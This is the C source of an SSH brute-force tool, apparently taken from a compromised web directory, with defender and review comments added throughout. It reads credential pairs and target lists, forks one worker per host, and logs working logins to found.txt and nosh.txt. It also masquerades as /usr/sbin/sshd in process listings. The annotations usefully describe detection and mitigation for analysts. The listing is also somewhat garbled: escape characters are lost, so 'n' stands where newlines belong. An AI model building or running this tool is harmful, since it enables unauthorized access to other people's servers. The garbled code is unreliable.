Current File : //var/www/html/kamini/xp/ssh.c

/*
 * by FULG of #texter :)
 * greetings to most famous Romanian h4x0rs :
 * lover4you, ps, LordNikon, iptables, sonkeriki, starters, zorg, pentaguard
 * rou:
 * Ca sa il compilati trebuie sa aveti instalat
 * http://packetstormsecurity.org/crypt/LIBS/ssh/libssh-0.1.tgz ; 
 * Dupa ce instalezi libssh cp /usr/local/lib/libssh.so /usr/lib/
 * gcc -o brutessh fulg.c -I /usr/local/include -L /usr/local/lib/ -lssh -lpthread
 * 
 * Mai multe bunatati pe www.fulg.home.ro ! 
 * Editeaza pass.txt in felul urmator : 
 * user  pass
 * user2 pass2
 * user3 pass3
 * 
 * Ce face brutessh-ul nostru :
 * - isi ascunde procesul in ps
 * - poti sa il modifici sa iti execute comenzi pe serverul gasit :)
 * - nu mai da erori segmault default , gata !
 * - are culori frumoase si un mesaj si mai frumos pt unguri
 * 
 * eng:
 *  some code ripped from zorg's brutessh.c
 *  -- this was private for 3 years!
 *  edit the pass.txt in the next format : 
 *    user1 pass1
 *    user2 pass2
 *    user3 pass3
 * Cheers.
 * - it fakes the process name in the ps list
 * - it gets users/password from a list
 * - some bugfixes
 * - optimized
 * TODO:
 *  - fix some bugs
 *  - make it to execute commands on the host it hacks.
 *  
*/
#include <stdio.h>
#include <arpa/inet.h>
#include <libssh/libssh.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
/* Process-name decoy: main() copies this string over argv[0], so process
 * listings show the tool as "/usr/sbin/sshd". Triage hint: compare the
 * displayed name with the real executable path (on Linux, /proc/<pid>/exe). */
#define FAKE "/usr/sbin/sshd"

/* flag:  tested in checkauth() before a hit is logged; the only assignment to
 *        it in this file is commented out, so it keeps its zero initial value.
 * where: reset to 0 in each child in main() and incremented on every
 *        checkauth() call; nothing in this file reads it. */
int flag,where;
/*
 * shell() - probe whether an authenticated session yields a shell that stays open.
 *
 * Opens a session channel, requests a PTY only when the tool's own stdin is a
 * terminal, requests a shell, then polls the channel every 0.5 s.
 *
 * Returns 1 once more than 5 seconds have passed since the shell request and a
 * poll reports nothing to read while the channel is still open; returns 0 if
 * channel->open drops to 0 first. checkauth() uses the result to choose
 * between its two log files (found.txt for 1, nosh.txt for 0).
 *
 * NOTE(review): apart from the poll result, every value stored in err is
 * ignored, and channel is dereferenced without a NULL check. Neither readbuf
 * nor the channel is released in this function.
 */
int shell(SSH_SESSION *session){
 /* Empty declaration; it introduces no variable and has no effect. */
 struct timeval;
 int err;
 BUFFER *readbuf=buffer_new();
 time_t start;
 CHANNEL *channel;
 channel = open_session_channel(session,1000,1000);
 if(isatty(0)) // PTY is requested only when the tool itself runs on a terminal
   err=channel_request_pty(channel); // result not checked
 err= channel_request_shell(channel); // result not checked
 start=time(0); // reference point for the 5-second window below
 while (channel->open!=0) // loop until the channel is reported closed
   {
    usleep(500000); // 0.5 s between polls
    err=channel_poll(channel,0);
    if(err>0){ // presumably "data is waiting" -- confirm against the libssh-0.1 API
    err=channel_read(channel,readbuf,0,0); // drain into readbuf; the data is never inspected
     }
    else
    {
     /* Nothing to read: if the channel has outlived the 5-second window,
      * report it as a live shell. */
     if(start+5<time(0))
     {
      return 1;
     }
    }
    }
    /* The channel closed before the window expired. */
    return 0;
   }
/*
 * checkauth() - try one user/password pair against one host and log the outcome.
 *
 * user, password: the pair to try; host: the target string passed by main().
 *
 * Flow, as written:
 *   - connection failure or password rejection: return silently, nothing logged;
 *   - password accepted and shell() returns 1: append to found.txt and print;
 *   - password accepted and shell() returns 0: append to nosh.txt and print.
 *
 * Defender notes:
 *   - found.txt and nosh.txt, created in the tool's working directory, hold
 *     working credentials in clear text; on a host where this file is found
 *     they list accounts that need their passwords changed.
 *   - Every accepted login triggers a reverse lookup of the target address via
 *     gethostbyaddr(), which is visible on the scanning host's resolver.
 *   - On the target, this appears as password-authentication attempts for many
 *     user names from one source; disabling password authentication or
 *     rate-limiting failed logins blunts it.
 *
 * NOTE(review): fopen() results are used unchecked, myaddr is never freed, and
 * the session is not disconnected on the success paths.
 */

 void checkauth(char *user,char *password,char *host) {
  struct hostent *hp;struct in_addr  *myaddr;
  SSH_SESSION *session; // libssh session handle
  SSH_OPTIONS *options;
  /* Dummy argc/argv handed to ssh_getopt() to obtain an options object. */
  int argc=1;
  char *argv[]={"none"};
  FILE *vulnf,*nolog; // found.txt and nosh.txt handles
  where++;
  /* Re-arms a 10-second alarm on every call. No SIGALRM handler is installed
   * in this file, so presumably the default action (process termination)
   * applies if an attempt hangs -- confirm. */
  alarm(10);
  options=ssh_getopt(&argc,argv);
  options_set_username(options,user);
  options_set_host(options,host);
  session=ssh_connect(options);
  if(!session) return ;
  if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS) // password rejected: disconnect, log nothing
  {
   ssh_disconnect(session);
   return;
  }
  if(shell(session)) // password accepted and the shell channel stayed open
  {
  /* flag is never set in this file (the assignment below is commented out),
   * so this branch is always taken. */
  if(!flag){
   myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
   myaddr->s_addr=inet_addr(host);
   /* Reverse lookup, used only to annotate the log line. */
   hp = gethostbyaddr((char *) myaddr,4,AF_INET);
   if((hp!=NULL)){
   vulnf=fopen("found.txt","a+");
   fprintf(vulnf,"%s:%s %s | %s\n",user,password,host,hp->h_name);
   printf("n Got: %s:%s %s | %s\n",user,password,host,hp->h_name);}
   else{
   vulnf=fopen("found.txt","a+");
   fprintf(vulnf,"%s:%s %s | without host\n",user,password,host);
   printf("n Got: %s:%s %s | without host\n",user,password,host);
   }
 //  flag=1;
   fclose(vulnf);
  }
  }
  else{ // password accepted, but the channel closed before shell()'s 5-second window
     myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
     myaddr->s_addr=inet_addr(host);
     hp = gethostbyaddr((char *) myaddr,4,AF_INET);
    nolog=fopen("nosh.txt","a+");
    if((hp!=NULL)){
    fprintf(nolog,"%s %s %s | %s\n",user,password,host,hp->h_name);
    printf("n nosh -> %s %s %s | %s\n",user,password,host,hp->h_name);}
 else
 {
  fprintf(nolog,"%s %s %s | without host\n",user,password,host);
    printf("n nosh -> %s %s %s | without host\n",user,password,host);}

    fclose(nolog);
  }
 }
 /*
  * main() - load the credential list, then fork one worker per target line.
  *
  * Inputs, all relative to the working directory:
  *   passwd.lst - space-separated tokens, consumed in pairs (user, password);
  *   ip.conf    - one target per line;
  *   argv[1]    - intended cap on concurrent child processes.
  *
  * Defender notes:
  *   - File artifacts next to the binary: passwd.lst and ip.conf as inputs,
  *     found.txt and nosh.txt as outputs written by checkauth().
  *   - argv[0] is overwritten with FAKE ("/usr/sbin/sshd"), so ps-style
  *     listings show an sshd look-alike. It can still be told apart by its
  *     real executable path, its working directory, and its many short-lived
  *     children making outbound SSH connections.
  *
  * NOTE(review): as displayed, the two strchr() calls match the letter 'n'
  * and some format strings begin with a stray "n". The listing has probably
  * lost characters in extraction, so treat it as lossy when comparing it with
  * other copies of the sample.
  */
 int main(int argc, char **argv)
 {
  FILE *fp,*passf;
  char *c;
  char buff[4096];
  char *a[80196], nutt[4096], *temp, *t, *string;
  /* Both results are discarded; these calls only leak memory. */
  malloc(sizeof(a));
  malloc(sizeof(nutt));
  int count = 0, i;
  /* numforks is read below without being initialised anywhere in this file. */
  int numforks,maxf;
  if((passf=fopen("passwd.lst","r")) == NULL)
   { // the credential list is opened before the argument count is checked
   printf("[+] FATAL: Cannot find passwd.lst\n");
   return -1;
   }
    /* Tokenise each line on spaces and store every token in a[]; count is
     * never compared against the capacity of a[]. */
    while (fgets(nutt,2024,passf))
       {
         while (t = strchr (nutt,'n'))
           *t = '.';
         temp = strtok (nutt, " ");
         string = strdup (temp);
         a[count++]=string;
          while (temp = strtok (NULL, " "))
           {
               string = strdup (temp);
               a[count++]=string;
           }

              }
  fclose(passf);

  if(argc!=2)
  {
   printf("[+] SSH BruteForce 2013 powered by XphaN @ UnderNet\n");
   printf("[+] %s <theards>\n",argv[0]);
   printf("\n");

   exit(0);
  }
  if((fp=fopen("ip.conf","r"))==NULL) exit(printf("[+] FATAL: Cannot open ip.conf\n"));

  maxf=atoi(argv[1]);

/* Overwrites the argv[0] storage in place with FAKE; the copy is not bounded
 * by the length of the original argv[0]. */
strcpy(argv[0],FAKE);    // fake the proccess name.
  while(fgets(buff,sizeof(buff),fp))
  {
   c=strchr(buff,'n');
   if(c!=NULL) *c='.';
   /* Child: run every stored pair against this target line, then exit. */
   if (!(fork()))
   {
   where=0;
//   printf("--> attacking %s",buff);
  for (i=0; i<count; i=i+2){
//   printf("--> Trying %s:%s %sn",a[i],a[i+1],buff);
      checkauth(a[i],a[i+1],buff); // one attempt per (user, password) pair
  }
   exit(0);
   }
   else
   {
  /* Parent: count the child and reap children while the count exceeds maxf. */
  numforks++;
  if (numforks > maxf)
  for (numforks; numforks > maxf; numforks--)
  wait(NULL);
   }
  }
 }